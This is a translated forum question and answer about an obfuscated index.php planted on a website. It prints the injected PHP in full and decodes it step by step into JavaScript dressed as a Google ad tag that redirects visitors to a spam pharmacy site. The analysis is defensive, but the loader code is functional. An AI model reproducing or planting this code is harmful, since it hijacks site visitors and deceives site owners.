在網站上發現奇怪的index.php

Question

我在我的網站上發現了一個奇怪而模糊的文件“Index.php”。 我不知道是誰把它放在我的頁面上，但我想了解它的作用。

通過用十六進制值替換字符，文件首先被隱藏了。

<?php /* copyright */ ${"GL\x4fB\x41\x4c\x53"}["\x6bg\x6e\x72\x77i\x6e\x64\x62n"]="\x74x\x74";$egeillbp="\x6b";${"\x47\x4cO\x42\x41L\x53"}["\x63kmj\x63uie"]="\x76";foreach($_GET as${$egeillbp}=>${${"\x47L\x4fB\x41\x4cS"}["\x63k\x6d\x6acu\x69e"]}){${"\x47\x4cO\x42\x41\x4c\x53"}["d\x78\x77\x71o\x61lv\x61\x75\x65"]="\x6b";if(preg_match("!^[a-\x7a\x30-\x39]{10,\x332}\$\x21is",${${"\x47\x4cO\x42\x41LS"}["\x64\x78\x77\x71\x6f\x61\x6c\x76a\x75\x65"]})){$xfgspywrt="\x6b";$jdhbwek="\x74\x78\x74";${$jdhbwek}=base64_decode("\x50\x46\x4eD\x55klQV\x43B\x73Y\x57\x35\x6edWFnZT1q\x59\x58Z\x68\x63\x32\x4ey\x61X\x420Pg\x30\x4b\x50\x43E\x74L\x510K\x5a\x6eVuY3Rpb2\x34g\x5a\x32V0\x62W\x55o\x63\x33RyK\x510\x4b\x65yB2YX\x49g\x61WR4ID\x30\x67\x633R\x79\x4cmluZGV\x34\x542\x59\x6f\x4a\x7a\x38n\x4bT\x73\x67a\x57\x59g\x4bG\x6c\x6be\x43A9P\x53A\x74\x4dS\x6bgc\x6dV0\x64\x58\x4au\x49\x48\x4e\x30cjsgd\x6dFy\x49Gx\x6cb\x69\x419\x49\x48\x4e0ci5\x73ZW\x35\x6e\x64G\x67\x37I\x48Z\x68\x63\x69B\x75\x5aXd\x66c3R\x79I\x440g\x49\x69I7\x49HZ\x68c\x69\x42\x70ID0\x67\x4dTs\x67\x5am\x39\x79I\x43g\x72K2\x6c\x6beDs\x67\x61\x57R\x34\x49\x44w\x67\x62G\x56\x75O\x79Bp\x5a\x48g\x67\x4bz0\x67\x4dixp\x4b\x79\x73\x70D\x51\x70\x37IH\x5ahciB\x6aaC\x41\x39\x49H\x42h\x63n\x4e\x6c\x53W\x35\x30KHN0\x63i\x35\x7a\x64\x57\x4az\x64\x48\x49oa\x57\x524LC\x41\x79KS\x77\x67\x4d\x54YpOy\x42\x75ZXd\x66\x63\x33RyICs\x39IFN\x30\x63ml\x75\x5ay\x35\x6dcm\x39t\x51\x32\x68\x68c\x6b\x4evZ\x47\x55o\x4b\x47N\x6fI\x43\x73ga\x53k\x67\x4aSAyNTY\x70\x4fy\x429IA0KZ\x479jdW\x31\x6cb\x6e\x51ud3Jp\x64\x47U\x6f\x62\x6d\x56\x33\x58\x33\x4e0c\x695zdWJ\x7a\x64H\x49o\x4d\x43xu\x5a\x58\x64f\x633\x52y\x4c\x6dx\x6c\x62\x6d\x640\x61C\x30xMSk\x72\x49lx\x31MD\x41yNlx1M\x44\x412\x4e1\x781M\x44\x41\x32Rl\x781\x4dDA\x32\x51\x6c\x781\x4dD\x412Qlx1M\x44\x41\x7a\x52Fp\x61Wl\x70\x63d\x54\x41\x77M\x6a\x4ac\x64\x54A\x77\x4d0\x4acdTA\x77M0Nc\x64T\x41\x77\x4d\x6bZcd\x54AwNz\x4e\x63d\x54\x41\x77\x4ejN\x63dT\x41w\x4ez\x4acdT\x41\x77\x4ejlcd\x54A\x77\x4ez\x42\x63dTA\x77NzR\x63\x64TA\x77\x4d0\x55i\x4b\x54sNC\x6e0\x4eC\x6d\x64vb\x32\x64\x73ZV\x39\x68\x5a\x46\x39jb\x47\x6c\x6cb\x6eQg\x50\x53A\x69c\x48V\x69\x4cTE\x30M\x7a\x411\x4fDQ\x30M\x44g\x7aMTM\x34\x4e\x44\x4d\x69O\x770\x4b\x5a\x329v\x5a2xlX\x32\x46\x6bX\x33d\x70\x5aH\x52\x6f\x49D\x30g\x4e\x7aI\x34\x4f\x77\x30KZ\x32\x39vZ2\x78lX2\x46\x6b\x58\x32\x68la\x57\x64o\x64\x43A\x39IDk\x77Ow\x30KZ29vZ2\x78\x6c\x58\x32F\x6bX\x32Z\x76c\x6d\x31h\x64\x43A9\x49\x43I3\x4d\x6a\x68\x34OTBf\x59\x58\x4diOw\x30\x4b\x5a29\x76\x5a\x32\x78l\x58\x32Fk\x583\x525cGU\x67P\x53A\x69dG\x56\x34dF\x39\x70\x62\x57F\x6eZ\x53\x497\x44Q\x70\x6e\x6229\x6e\x62\x47\x56\x66Y\x57Rf\x59\x32hh\x62\x6d5l\x62C\x419\x49\x43\x49\x69O\x77\x30KZ\x32\x560\x62WUo\x49\x6d\x680\x64H\x416Ly9\x77Y\x57d\x6cYWQ\x79L\x6d\x64vb2\x64sZ\x58N\x35bmR\x70Y\x32\x460a\x579\x75L\x6d\x4e\x76\x62\x53\x39wY\x57d\x6cYWQvc\x32\x68vd1\x39\x68Z\x48\x4du\x61nM/M\x30\x493MTYwN\x6b\x55\x32\x4e\x44\x5aB\x4e\x6bQxO\x44\x59zN\x54c2M\x7a\x56CN\x6ag\x31\x4d\x7aU4\x4eT\x55\x79QzE\x77\x4e\x54c0\x52\x44YxNEI1Q\x7aR\x43\x4e\x54k\x30Rj\x551NTg\x77NTIwNT\x670O\x54\x52\x45N\x44\x49\x30QzUz\x4d\x44\x6b0\x4ejQ4M\x30Iz\x4f\x44R\x42M\x30\x55\x30\x4d\x7aQ\x78ME\x5a\x47\x4d\x7a\x4d\x34\x4eD\x4d\x30M\x6aN\x45M\x44\x5aGQ\x55\x595R\x6bV\x47N\x6bY\x34R\x6aZGN\x6bYyRjR\x47N\x6bY\x33RUVG\x4dE\x591\x52\x6a\x46F\x51\x6a\x4aE\x4d\x6b\x4e\x46Nz\x49\x34MUY\x79\x4e\x6bY\x30\x4dTUxO\x54\x454RUV\x46N0R\x47\x52\x45Z\x45\x52\x6bQyMUUxRjB\x43R\x54V\x45\x51\x55R\x42RDV\x45\x4eU\x4d1RE\x52E\x52EN\x47MTIwMTBG\x4dDUwQj\x42FR\x44c\x69\x4bT\x73\x4e\x43\x69\x38\x76L\x530+I\x44wv\x55\x30\x4eSSVB\x55\x50\x67\x3d\x3d");echo str_replace("\x5a\x5a\x5a\x5a",${$xfgspywrt},${${"GLOB\x41LS"}["\x6bgnr\x77\x69\x6e\x64\x62\x6e"]});exit;}} /* copyright */ ?>

我制作了一個小工具，將腳本翻譯成它的起源。

<?php /* copyright */ 

    ${"GLOBALS"}["kgnrwindbn"]="txt";
    $egeillbp="k";${"GLOBALS"}["ckmjcuie"]="v";

    foreach($_GET as${$egeillbp}=>${${"GLOBALS"}["ckmjcuie"]})
    {
        ${"GLOBALS"}["dxwqoalvaue"]="k";
        if(preg_match("!^[a-z0-9]{10,32}\$!is",${${"GLOBALS"}["dxwqoalvaue"]}))
        {
            $xfgspywrt="k";
            $jdhbwek="txt";
            ${$jdhbwek} = base64_decode("PFNDUklQVCBsYW5ndWFnZT1qYXZhc2NyaXB0Pg0KPCEtLQ0KZnVuY3Rpb24gZ2V0bWUoc3RyKQ0KeyB2YXIgaWR4ID0gc3RyLmluZGV4T2YoJz8nKTsgaWYgKGlkeCA9PSAtMSkgcmV0dXJuIHN0cjsgdmFyIGxlbiA9IHN0ci5sZW5ndGg7IHZhciBuZXdfc3RyID0gIiI7IHZhciBpID0gMTsgZm9yICgrK2lkeDsgaWR4IDwgbGVuOyBpZHggKz0gMixpKyspDQp7IHZhciBjaCA9IHBhcnNlSW50KHN0ci5zdWJzdHIoaWR4LCAyKSwgMTYpOyBuZXdfc3RyICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGNoICsgaSkgJSAyNTYpOyB9IA0KZG9jdW1lbnQud3JpdGUobmV3X3N0ci5zdWJzdHIoMCxuZXdfc3RyLmxlbmd0aC0xMSkrIlx1MDAyNlx1MDA2N1x1MDA2Rlx1MDA2Qlx1MDA2Qlx1MDAzRFpaWlpcdTAwMjJcdTAwM0JcdTAwM0NcdTAwMkZcdTAwNzNcdTAwNjNcdTAwNzJcdTAwNjlcdTAwNzBcdTAwNzRcdTAwM0UiKTsNCn0NCmdvb2dsZV9hZF9jbGllbnQgPSAicHViLTE0MzA1ODQ0MDgzMTM4NDMiOw0KZ29vZ2xlX2FkX3dpZHRoID0gNzI4Ow0KZ29vZ2xlX2FkX2hlaWdodCA9IDkwOw0KZ29vZ2xlX2FkX2Zvcm1hdCA9ICI3Mjh4OTBfYXMiOw0KZ29vZ2xlX2FkX3R5cGUgPSAidGV4dF9pbWFnZSI7DQpnb29nbGVfYWRfY2hhbm5lbCA9ICIiOw0KZ2V0bWUoImh0dHA6Ly9wYWdlYWQyLmdvb2dsZXN5bmRpY2F0aW9uLmNvbS9wYWdlYWQvc2hvd19hZHMuanM/M0I3MTYwNkU2NDZBNkQxODYzNTc2MzVCNjg1MzU4NTUyQzEwNTc0RDYxNEI1QzRCNTk0RjU1NTgwNTIwNTg0OTRENDI0QzUzMDk0NjQ4M0IzODRBM0U0MzQxMEZGMzM4NDM0MjNEMDZGQUY5RkVGNkY4RjZGNkYyRjRGNkY3RUVGMEY1RjFFQjJEMkNFNzI4MUYyNkY0MTUxOTE4RUVFN0RGREZERkQyMUUxRjBCRTVEQURBRDVENUM1RERERENGMTIwMTBGMDUwQjBFRDciKTsNCi8vLS0+IDwvU0NSSVBUPg==");
            echo str_replace("ZZZZ",${$xfgspywrt},${${"GLOBALS"}["kgnrwindbn"]});
            exit;
        } 
    }
/* copyright */ ?>

但是這仍然沒有用，因為內部有base64解碼。 已解碼的內容如下所示：

<SCRIPT language=javascript>
<!--
function getme(str)
{ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } 
document.write(new_str.substr(0,new_str.length-11)+"\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}
google_ad_client = "pub-1430584408313843";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
//--> </SCRIPT>

而且Unicode部分也已被編碼。 這是解碼Unicode部分的結果。

&gokk=ZZZZ";</script>

現在我知道了內容，但仍然無法弄清楚它的作用。 （我不想嘗試一個我不知道的劇本）。

我的猜測是它試圖在循環中調用谷歌添加。 但這是否有意義 - 因為谷歌將阻止重復的IP地址。

有沒有人在你的網站上看過這些劇本？ 或者你知道腳本的作用嗎？ 謝謝你的所有建議。

Answer 1

在進行了一些調查之后，看起來這個腳本試圖將任何點擊重定向到index.php所在的任何點擊都是一個可疑的制葯網站。 所有谷歌的東西都是一種巧妙實現的方式來隱藏JavaScript中的URL重定向。

首先，用console.log替換document.write ：

function getme(str) {
    var idx = str.indexOf('?');
    if (idx == -1) return str;
    var len = str.length;
    var new_str = "";
    var i = 1;
    for (++idx; idx < len; idx += 2, i++) {
        var ch = parseInt(str.substr(idx, 2), 16);
        new_str += String.fromCharCode((ch + i) % 256);
    }
    console.log(new_str.substr(0, new_str.length - 11) + "\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}

getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");

我們得到這個：

<script language="javascript">window.location="http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ";</script>

re.da.ct.ed是一個IP地址。 函數getme()只是解析附加到Google URL（這是一個紅色鯡魚）的slug。

在解碼的URL上對標頭執行cURL請求，我們得到：

$ curl 'http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ' -I
HTTP/1.1 302 Found
Date: Fri, 27 Jun 2014 21:07:39 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u5
Location: https://www.sleazydrugstore.net
Vary: Accept-Encoding
Content-Type: text/html

看起來它只不過是將訪客重定向到一個看起來很像葯店的葯店，盡管那里可能隱藏着一些更惡毒的東西。

_{我不確定是否在這里發布真實的URL和IP，因此我們將不勝感激。}

在網站上發現奇怪的index.php

問題描述

1 個解決方案

解決方案1
7 已采納 2014-06-27 21:14:03

在網站上發現奇怪的index.php

問題描述

1 個解決方案

解決方案1 7 已采納 2014-06-27 21:14:03

解決方案1
7 已采納 2014-06-27 21:14:03